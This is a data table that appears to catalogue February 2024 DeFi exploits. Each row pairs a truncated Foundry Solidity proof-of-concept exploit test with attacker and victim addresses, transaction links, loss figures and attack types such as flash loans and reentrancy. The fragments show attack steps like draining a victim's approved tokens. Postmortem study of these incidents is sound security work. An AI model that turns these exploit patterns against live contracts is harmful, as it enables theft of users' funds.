XTOKEN.mint(address(this), DAI.balanceOf(address(wrapper)))... | true | ~7729 $DAI $USDC | https://etherscan.io/address/0x38f68f119243adbca187e1ef64344ed475a8c69c | https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 | https://etherscan.io/address/0x2b9dc65253c035eb21778cb3898eab5a0ada0cce | https://etherscan.io/tx/0xc0be8c3792a5b1ba7d653dc681ff611a5b79a75fe51c359cf1aac633e9441574 | $7.7K | 7.24 | medium | SwarmMarkets Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~439537 US$
// Attacker : 0xe000008459b74a91e306a47c808061dfa372000e
// Attack Contract : 0x2f99fb66ea797e7fa2d07262402ab38bd5e53b12
// Vulnerable Contract : Compound pr... | exploit_poc | CompoundUni | 2024-02 | CompoundUni_exp.sol | flash_loan | 9851277f45e86273 | 2026-01-07T10:59:16.514368 | postmortems | ethereum | 19,290,921 | ~439537 US$ | 439,537 | null | null | null | https://etherscan.io/tx/0xaee0f8d1235584a3212f233b655f87b89f22f1d4890782447c4ef742b37af58d | null | https://twitter.com/0xLEVI104/status/1762092203894276481 | true | true | true | high | ~439537 US$ | flash-loan | function testExploit() public {
console.log("USDC balance:");
emit log_named_decimal_uint(" [INFO] Before attack", USDC.balanceOf(address(this)), 6);
address[] memory tokens = new address[](1);
uint256[] memory amounts = new uint256[](1);
tokens[0] = address(USDC);
amo... | true | ~439537 US$ | https://etherscan.io/tx/0xaee0f8d1235584a3212f233b655f87b89f22f1d4890782447c4ef742b37af58d | https://twitter.com/0xLEVI104/status/1762092203894276481 | $439.5K | 8.82 | high | CompoundUni Exploit (2024-02) | true | false | true | false | ||||
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$1,400,000 USD
// Attacker : https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671 (whitehat)
// Attack Contract : https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809
// Vulnerable Contract : ht... | exploit_poc | BlueberryProtocol | 2024-02 | BlueberryProtocol_exp.sol | flash_loan | a551f43d531569c9 | 2026-01-07T10:59:16.514423 | postmortems | ethereum | 19,287,289 | ~$1,400,000 USD | 1 | https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671 | https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 | https://etherscan.io/address/0xffadb0bba4379dfabfb20ca6823f6ec439429ec2 | https://etherscan.io/tx/0xf0464b01d962f714eee9d4392b2494524d0e10ce3eb3723873afd1346b8b06e4 | null | null | true | true | true | low | ~$1,400,000 USD | flash-loan | function testAttack() public {
vm.deal(address(this), 0.000000000000009997 ether);
WETH.deposit{value: 0.000000000000009997 ether}();
approveAll();
address[] memory tokens = new address[](1);
tokens[0] = address(WETH);
uint256[] memory amounts = new uint256[](1);
... | true | ~$1,400,000 USD | https://etherscan.io/address/0xc0ffeebabe5d496b2dde509f9fa189c25cf29671 | https://etherscan.io/address/0x3aa228a80f50763045bdfc45012da124bd0a6809 | https://etherscan.io/address/0xffadb0bba4379dfabfb20ca6823f6ec439429ec2 | https://etherscan.io/tx/0xf0464b01d962f714eee9d4392b2494524d0e10ce3eb3723873afd1346b8b06e4 | $1 | 9.32 | high | BlueberryProtocol Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 200K
// Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
// Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f... | exploit_poc | DN404 | 2024-02 | DN404_exp.sol | null | 4bda2dd111204c71 | 2026-01-07T10:59:16.514475 | postmortems | ethereum | null | 200K | 200,000 | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | https://etherscan.io/address/0x2c7112245fc4af701ebf90399264a7e89205dad4 | https://etherscan.io/tx/0xbeef09ee9d694d2b24f3f367568cc6ba1dad591ea9f969c36e5b181fd301be82 | null | null | true | true | false | high | 200K | unknown | function testExploit() public {
// Implement exploit code here
emit log_named_decimal_uint(" Attacker USDT Balance Before exploit", IERC20(USDT).balanceOf(address(this)), 6);
uint256 initPeriods = 1;
uint256 initInterval = 1_000_000_000_000_000_000;
uint256 amount = IERC20(FLIX)... | true | 200K | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | https://etherscan.io/address/0x2c7112245fc4af701ebf90399264a7e89205dad4 | https://etherscan.io/tx/0xbeef09ee9d694d2b24f3f367568cc6ba1dad591ea9f969c36e5b181fd301be82 | $200.0K | 7.3 | medium | DN404 Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$6M
// Attacker : https://etherscan.io/address/0x94641c01a4937f2c8ef930580cf396142a2942dc
// Vuln Contract : https://etherscan.io/address/0x65c210c59b43eb68112b7a4f75c8... | exploit_poc | Seneca | 2024-02 | Seneca_exp.sol | null | eeb6a4a7c030ffb1 | 2026-01-07T10:59:16.514521 | postmortems | ethereum | 19,325,936 | ~$6M | 6,000,000 | https://etherscan.io/address/0x94641c01a4937f2c8ef930580cf396142a2942dc | null | null | https://app.blocksec.com/explorer/tx/eth/0x23fcf9d4517f7cc39815b09b0a80c023ab2c8196c826c93b4100f2e26b701286 | null | null | true | true | false | critical | ~$6M | unknown | function testExploit() public {
// Datas
uint256 amount = PendlePrincipalToken.balanceOf(victim);
bytes memory callData =
abi.encodeWithSignature("transferFrom(address,address,uint256)", victim, address(this), amount);
bytes memory data = abi.encode(address(PendlePrincipalTok... | true | ~$6M | https://etherscan.io/address/0x94641c01a4937f2c8ef930580cf396142a2942dc | https://app.blocksec.com/explorer/tx/eth/0x23fcf9d4517f7cc39815b09b0a80c023ab2c8196c826c93b4100f2e26b701286 | $6.00M | 6.26 | medium | Seneca Exploit (2024-02) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.24;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~50 $ETH
// Attacker : https://etherscan.io/address/0x2c903f97ea69b393ea03e7fab8d64d722b3f5559
// Attack Contract : https://etherscan.io/address/0xe55607b2967ddbe5fa9a6a... | exploit_poc | ParticleTrade | 2024-02 | ParticleTrade_exp.sol | null | a9ac3d0b2d200448 | 2026-01-07T10:59:16.514573 | postmortems | ethereum | 19,231,445 | ~50 $ETH | 50 | https://etherscan.io/address/0x2c903f97ea69b393ea03e7fab8d64d722b3f5559 | https://etherscan.io/address/0xe55607b2967ddbe5fa9a6a921991545b8277ef8f | https://etherscan.io/address/0xe4764f9cd8ecc9659d3abf35259638b20ac536e4 | https://etherscan.io/tx/0xd9b3e229acc755881890394cc76fde0d7b83b1abd4d046b0f69c1fd9fd495ff6 | null | null | true | true | false | low | ~50 $ETH | unknown | function testExploit() public {
payable(zero).transfer(address(this).balance);
emit log_named_decimal_uint("Attacker Eth balance before attack:", address(this).balance, 18);
uint256 tokenId = 50_126_827_091_960_426_151;
uint256 tokenId2 = 19_231_446;
(uint256 lienId) = proxy.offe... | true | ~50 $ETH | https://etherscan.io/address/0x2c903f97ea69b393ea03e7fab8d64d722b3f5559 | https://etherscan.io/address/0xe55607b2967ddbe5fa9a6a921991545b8277ef8f | https://etherscan.io/address/0xe4764f9cd8ecc9659d3abf35259638b20ac536e4 | https://etherscan.io/tx/0xd9b3e229acc755881890394cc76fde0d7b83b1abd4d046b0f69c1fd9fd495ff6 | $50 | 8.23 | high | ParticleTrade Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~3.5 WBNB
// Attacker : https://bscscan.com/address/0x031958a8137745350549fd95055398dd536a07c7
// Attack Contract : https://bscscan.com/address... | exploit_poc | MINER_bsc | 2024-02 | MINER_bsc_exp.sol | flash_loan | d6f2b2f39e71b48c | 2026-01-07T10:59:16.514620 | postmortems | bsc | 36,111,183 | ~3.5 WBNB | 3.5 | https://bscscan.com/address/0x031958a8137745350549fd95055398dd536a07c7 | https://bscscan.com/address/0xc9716ec1b0503316233e3bcc50853f0df6befd43 | https://bscscan.com/address/0x2ba9d4a8c41c60b71ff7df2c3f54b008644b954e | https://bscscan.com/tx/0x15ab671c9bf918fa4b6a9eed9ccb527f32aca40e926ede2aec2c84dfa9c30512 | null | null | true | true | true | low | ~3.5 WBNB | flash-loan | function testExploit() public {
Miner.approve(address(Router), type(uint256).max);
WBNB.approve(address(Router), type(uint256).max);
DVM(dodo).flashLoan(10 * 1e18, 0, address(this), abi.encode(0x3078));
emit log_named_decimal_uint("[End] Attacker WBNB balance after exploit", WBNB.balanc... | true | ~3.5 WBNB | https://bscscan.com/address/0x031958a8137745350549fd95055398dd536a07c7 | https://bscscan.com/address/0xc9716ec1b0503316233e3bcc50853f0df6befd43 | https://bscscan.com/address/0x2ba9d4a8c41c60b71ff7df2c3f54b008644b954e | https://bscscan.com/tx/0x15ab671c9bf918fa4b6a9eed9ccb527f32aca40e926ede2aec2c84dfa9c30512 | $4 | 8.26 | high | MINER_bsc Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~2.24 $WBNB
// Attacker : https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502
// Attack Contract : https://bscscan.com/address/0x3559ee265fc9c5c9a333b07e0199480b4a84f369
// Vulnerable Contract : https://bscsca... | exploit_poc | Babyloogn | 2024-02 | Babyloogn_exp.sol | null | 3385651e7a8a7e38 | 2026-01-07T10:59:16.514667 | postmortems | bsc | 36,159,516 | ~2.24 $WBNB | 2.24 | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x3559ee265fc9c5c9a333b07e0199480b4a84f369 | https://bscscan.com/address/0x971d08bba900230298add23e61e04b04226b5073 | https://app.blocksec.com/explorer/tx/bsc/0xd081d6bb96326be5305a6c00dd51d1799971794941576554341738abc1ceb202 | null | null | true | false | false | low | ~2.24 $WBNB | unknown | function testExploit() public {
emit log_named_uint("Attacker WBNB balance before attack", WBNB.balanceOf(address(this)));
Babyloogn.approve(address(Router), type(uint256).max);
BabyloognNTF.setApprovalForAll(address(Airdrop), true);
while (Babyloogn.balanceOf(address(Airdrop)) >= 285 *... | true | ~2.24 $WBNB | https://bscscan.com/address/0x835b45d38cbdccf99e609436ff38e31ac05bc502 | https://bscscan.com/address/0x3559ee265fc9c5c9a333b07e0199480b4a84f369 | https://bscscan.com/address/0x971d08bba900230298add23e61e04b04226b5073 | https://app.blocksec.com/explorer/tx/bsc/0xd081d6bb96326be5305a6c00dd51d1799971794941576554341738abc1ceb202 | $2 | 7.31 | medium | Babyloogn Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.24;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~140 $ETH
// Attacker : https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba
// Attack Contract : https://etherscan.io/address/0xbff51c9c3d50d6168dfef... | exploit_poc | Miner | 2024-02 | Miner_exp.sol | null | 56c52ef75aebfc6c | 2026-01-07T10:59:16.514713 | postmortems | ethereum | 19,226,508 | ~140 $ETH | 140 | https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba | https://etherscan.io/address/0xbff51c9c3d50d6168dfef72133f5dbda453ebf29 | https://etherscan.io/address/0x732276168b421d4792e743711e1a48172ea574a2 | https://etherscan.io/tx/0x75e3aeb00df69882a1b15d424e5e642650326ca3b923d7fd1922d57c51bc2c78 | null | null | true | true | false | low | ~140 $ETH | unknown | function testExploit() public {
emit log_named_uint("Attacker ETH balance before exploit", WETH.balanceOf(address(this)));
cheats.startPrank(attacker);
MINER.transfer(address(this), MINER.balanceOf(attacker));
MINER.balanceOf(address(this));
cheats.stopPrank();
bool zero... | true | ~140 $ETH | https://etherscan.io/address/0xea75aec151f968b8de3789ca201a2a3a7faeefba | https://etherscan.io/address/0xbff51c9c3d50d6168dfef72133f5dbda453ebf29 | https://etherscan.io/address/0x732276168b421d4792e743711e1a48172ea574a2 | https://etherscan.io/tx/0x75e3aeb00df69882a1b15d424e5e642650326ca3b923d7fd1922d57c51bc2c78 | $140 | 7.49 | medium | Miner Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~20 ETH
// Attacker : https://etherscan.io/address/0x145766a51ae96e69810fe76f6f68fd0e95675a0b
// Attack Contract : https://etherscan.io/address/0x8d4de2bc1a566b266bd4b38... | exploit_poc | Game | 2024-02 | Game_exp.sol | reentrancy | 6536ccc066a9eca1 | 2026-01-07T10:59:16.514756 | postmortems | ethereum | 19,213,946 | ~20 ETH | 20 | https://etherscan.io/address/0x145766a51ae96e69810fe76f6f68fd0e95675a0b | https://etherscan.io/address/0x8d4de2bc1a566b266bd4b387f62c21e15474d12a | null | https://app.blocksec.com/explorer/tx/eth/0x0eb8f8d148508e752d9643ccf49ac4cb0c21cbad346b5bbcf2d06974d31bd5c4 | null | null | true | true | true | low | ~20 ETH | reentrancy | function testExploit() public {
// Start with 0.6 Ether balance
deal(address(this), 0.6 ether);
emit log_named_decimal_uint("Exploiter ETH balance before attack", address(this).balance, 18);
// Following amount will be returned multiple times in receive() function when exploiter make th... | true | ~20 ETH | https://etherscan.io/address/0x145766a51ae96e69810fe76f6f68fd0e95675a0b | https://etherscan.io/address/0x8d4de2bc1a566b266bd4b387f62c21e15474d12a | https://app.blocksec.com/explorer/tx/eth/0x0eb8f8d148508e752d9643ccf49ac4cb0c21cbad346b5bbcf2d06974d31bd5c4 | $20 | 7.07 | medium | Game Exploit (2024-02) | true | false | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// TX : https://app.blocksec.com/explorer/tx/eth/0x7c5a909b45014e35ddb89697f6be38d08eff30e7c3d3d553033a6efc3b444fdd
// GUY : https://twitter.com/pennysplayer/status/1766479470058406174
// Profit :... | exploit_poc | PANDORA | 2024-02 | PANDORA_exp.sol | null | c82b3a4c78ec242e | 2026-01-07T10:59:16.514801 | postmortems | unknown | 19,184,577 | null | null | null | null | null | null | null | null | false | false | false | medium | null | unknown | false | Unknown | 1.1 | low | PANDORA Exploit (2024-02) | false | false | false | false | ||||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~20 ETH
// TX : https://app.blocksec.com/explorer/tx/eth/0xcf834aff4de9992f5da9c443600dad9c6277a8a00de5007842fece51564992db
// Attacker : https://etherscan.io/address/0x24a0c66f185874b251eb70bee2c2e35e398484... | exploit_poc | ADC | 2024-02 | ADC_exp.sol | flash_loan | 3bb7259f0229056f | 2026-01-07T10:59:16.514841 | postmortems | ethereum | 19,138,640 | ~20 ETH | 20 | https://etherscan.io/address/0x24a0c66f185874b251eb70bee2c2e35e39848419 | https://etherscan.io/address/0x2ffdce5f0c09a8ee3a568bc01f35894b2d77a6d6 | null | null | null | null | true | false | true | low | ~20 ETH | flash-loan | function testexploit() public payable {
Helper = new Help{value: 18 ether}();
WETH.approve(address(mainpool), 18 ether);
WETH.approve(address(tick), 18 ether);
WETH.approve(address(Helper), 18 ether);
Helper.startwith();
emit log_named_decimal_uint("Attacker WETH balanc... | true | https://etherscan.io/address/0x24a0c66f185874b251eb70bee2c2e35e39848419 | https://etherscan.io/address/0x2ffdce5f0c09a8ee3a568bc01f35894b2d77a6d6 | $20 | 7.02 | medium | ADC Exploit (2024-02) | true | false | false | false | |||||
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~$42000 USD
// Attacker : https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c
// Attack Contract : https://bscscan.com/address/0x38721b0d67dfdba1411bb277d95af3d53fa7200e
// Vulnerable Contract : https://bscscan.com... | exploit_poc | DualPools | 2024-02 | DualPools_exp.sol | flash_loan | 3dd21370b32ab20b | 2026-01-07T10:59:16.514895 | postmortems | bsc | 36,145,772 | ~$42000 USD | 42,000 | https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c | https://bscscan.com/address/0x38721b0d67dfdba1411bb277d95af3d53fa7200e | https://bscscan.com/address/0x5e5e28029ef37fc97ffb763c4ac1f532bbd4c7a2 | https://bscscan.com/tx/0x90f374ca33fbd5aaa0d01f5fcf5dee4c7af49a98dc56b47459d8b7ad52ef1e93 | null | null | true | true | true | medium | ~$42000 USD | flash-loan | function testAttack() public {
approveAll();
DPPOracle_0x1b52.flashLoan(7_001_000_000_000_000_000, 0, address(this), new bytes(1)); // borrow BUSD
} | true | ~$42000 USD | https://bscscan.com/address/0x4645863205b47a0a3344684489e8c446a437d66c | https://bscscan.com/address/0x38721b0d67dfdba1411bb277d95af3d53fa7200e | https://bscscan.com/address/0x5e5e28029ef37fc97ffb763c4ac1f532bbd4c7a2 | https://bscscan.com/tx/0x90f374ca33fbd5aaa0d01f5fcf5dee4c7af49a98dc56b47459d8b7ad52ef1e93 | $42.0K | 10 | high | DualPools Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~5 $ETH
// Attacker : https://etherscan.io/address/0x9733303117504c146a4e22261f2685ddb79780ef
// Attack Contract : https://etherscan.io/address/0x9bb0ca1e54025232e18f387... | exploit_poc | RuggedArt | 2024-02 | RuggedArt_exp.sol | null | b86cba36a2d88e18 | 2026-01-07T10:59:16.514973 | postmortems | ethereum | 19,262,234 | ~5 $ETH | 5 | https://etherscan.io/address/0x9733303117504c146a4e22261f2685ddb79780ef | https://etherscan.io/address/0x9bb0ca1e54025232e18f3874f972a851a910e9cb | https://etherscan.io/address/0xfe380fe1db07e531e3519b9ae3ea9f7888ce20c6 | https://etherscan.io/tx/0x5a63da39b5b83fccdd825fed0226f330f802e995b8e49e19fbdd246876c67e1f | null | null | true | false | false | low | ~5 $ETH | unknown | function testExploit() public {
payable(address(0)).transfer(WETH.balanceOf(address(this)));
deal(address(this), 0.000000000000000001 ether);
emit log_named_uint("Attacker Eth balance before attack:", WETH.balanceOf(address(this)));
pool.flash(address(this), flashnumber, 0, abi.encode(0)... | true | ~5 $ETH | https://etherscan.io/address/0x9733303117504c146a4e22261f2685ddb79780ef | https://etherscan.io/address/0x9bb0ca1e54025232e18f3874f972a851a910e9cb | https://etherscan.io/address/0xfe380fe1db07e531e3519b9ae3ea9f7888ce20c6 | https://etherscan.io/tx/0x5a63da39b5b83fccdd825fed0226f330f802e995b8e49e19fbdd246876c67e1f | $5 | 8.66 | high | RuggedArt Exploit (2024-02) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : Unclear
// Attacker : https://polygonscan.com/address/0x149b268b8b8101e2b5df84a601327484cb43221c
// Attack Contract : https://polygonscan.com/address/0x367120bf791cc03f0... | exploit_poc | SMOOFSStaking | 2024-02 | SMOOFSStaking_exp.sol | null | f158781465e5f2e7 | 2026-01-07T10:59:16.515031 | postmortems | polygon | 54,056,707 | Unclear | null | https://polygonscan.com/address/0x149b268b8b8101e2b5df84a601327484cb43221c | https://polygonscan.com/address/0x367120bf791cc03f040e2574aea0ca7790d3d2e5 | null | null | null | null | true | true | false | medium | Unclear | unknown | function testExploit() public {
// For the purpose of this poc transfer Smoofs NFT token from original attack contract
vm.prank(attackContract);
Smoofs.transferFrom(attackContract, address(this), smoofsTokenId);
Smoofs.approve(address(SMOOFSStaking), smoofsTokenId);
// Set initi... | true | Unclear | https://polygonscan.com/address/0x149b268b8b8101e2b5df84a601327484cb43221c | https://polygonscan.com/address/0x367120bf791cc03f040e2574aea0ca7790d3d2e5 | Unknown | 4.52 | low | SMOOFSStaking Exploit (2024-02) | false | false | false | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
@KeyInfo
- Total Lost: 33 $aEthwstETH
- Attacker: https://etherscan.io/address/0x09f6be2a7d0d2789f01ddfaf04d4eaa94efc0857
- Attack Contract: https://etherscan.io/address/0x12d85... | exploit_poc | AffineDeFi | 2024-02 | AffineDeFi_exp.sol | flash_loan | 51c9f40ef6fc4601 | 2026-01-07T10:59:16.515073 | postmortems | ethereum | 19,132,935 | 33 $aEthwstETH | 33 | https://etherscan.io/address/0x09f6be2a7d0d2789f01ddfaf04d4eaa94efc0857 | https://etherscan.io/address/0x12d85e5869258a80d4bebe70d176d0f58b2d68e4 | null | https://app.blocksec.com/explorer/tx/eth/0x03543ef96c26d6c79ff6c24219c686ae6d0eb5453b322e54d3b6a5ce456385e5 | null | null | true | false | true | low | 33 $aEthwstETH | flash-loan | false | 33 $aEthwstETH | https://etherscan.io/address/0x09f6be2a7d0d2789f01ddfaf04d4eaa94efc0857 | https://etherscan.io/address/0x12d85e5869258a80d4bebe70d176d0f58b2d68e4 | https://app.blocksec.com/explorer/tx/eth/0x03543ef96c26d6c79ff6c24219c686ae6d0eb5453b322e54d3b6a5ce456385e5 | $33 | 5.33 | medium | AffineDeFi Exploit (2024-02) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
// @KeyInfo - Total Lost : ~2 $ETH
// Vulnerable Contract : https://etherscan.io/address/0xFb35DE57B117FA770761C1A344784075745F84F9
// @Analysis
// https://x.com/PeiQi_0/status/1759826303044497726
import "forge-std/Test.sol";
import "./../interface.sol... | exploit_poc | EGGX | 2024-02 | EGGX_exp.sol | null | 4793db4604c3220b | 2026-01-07T10:59:16.515125 | postmortems | ethereum | 19,252,567 | ~2 $ETH | 2 | null | null | https://etherscan.io/address/0xFb35DE57B117FA770761C1A344784075745F84F9 | null | null | null | true | true | false | low | ~2 $ETH | unknown | function testExploit() public {
payable(address(0)).transfer(address(this).balance);
bytes memory pollbalance = abi.encode(EGGX.balanceOf(address(pool)));
WETH.approve(address(pool), type(uint256).max);
EGGX.approve(address(pool), type(uint256).max);
emit log_named_uint("Attacker... | true | ~2 $ETH | https://etherscan.io/address/0xFb35DE57B117FA770761C1A344784075745F84F9 | $2 | 7.36 | medium | EGGX Exploit (2024-02) | true | true | false | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo -- Total Lost : ~14 ETH
// TX : https://app.blocksec.com/explorer/tx/eth/0x06d7e7436414c658a33452d28400799f3637e83930dcec39b3bd065dabc6ef04
// Attacker : https://etherscan.io/address/0... | exploit_poc | Zoomer | 2024-02 | Zoomer_exp.sol | flash_loan | bd70700704ae3f61 | 2026-01-07T10:59:16.515175 | postmortems | ethereum | 19,291,249 | ~14 ETH | 14 | https://etherscan.io/address/0xb0380b6d7a63e7cbf274c3b3c8838abbd6bd4abe | https://etherscan.io/address/0xa4854022f4c16f0abc3fdec300427f6179a3043b | null | null | null | null | true | false | true | low | ~14 ETH | flash-loan | false | https://etherscan.io/address/0xb0380b6d7a63e7cbf274c3b3c8838abbd6bd4abe | https://etherscan.io/address/0xa4854022f4c16f0abc3fdec300427f6179a3043b | $14 | 5.12 | medium | Zoomer Exploit (2024-02) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
// Attacker: https://bscscan.com/address/0xc726bd0e973722e17eb088b8fcfedaa931fa0293
// Attack Contract: https://bscscan.com/address/0xe02970bd38b283c3079720c1e71001abe001bc83
// Attack Tx: https://phalcon.blocksec.com/tx/bsc/... | exploit_poc | FDP | 2023-02 | FDP_exp.sol | flash_loan | 625568195bbf078a | 2026-01-07T10:59:16.515222 | postmortems | bsc | 25,430,418 | null | null | https://bscscan.com/address/0xc726bd0e973722e17eb088b8fcfedaa931fa0293 | https://bscscan.com/address/0xe02970bd38b283c3079720c1e71001abe001bc83 | null | https://phalcon.blocksec.com/tx/bsc/0x09925028ce5d6a54801d04ff8f39e79af6c24289e84b301ddcdb6adfa51e901b | null | null | false | true | true | medium | null | flash-loan | false | https://bscscan.com/address/0xc726bd0e973722e17eb088b8fcfedaa931fa0293 | https://bscscan.com/address/0xe02970bd38b283c3079720c1e71001abe001bc83 | https://phalcon.blocksec.com/tx/bsc/0x09925028ce5d6a54801d04ff8f39e79af6c24289e84b301ddcdb6adfa51e901b | Unknown | 5.18 | medium | FDP Exploit (2023-02) | false | false | true | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.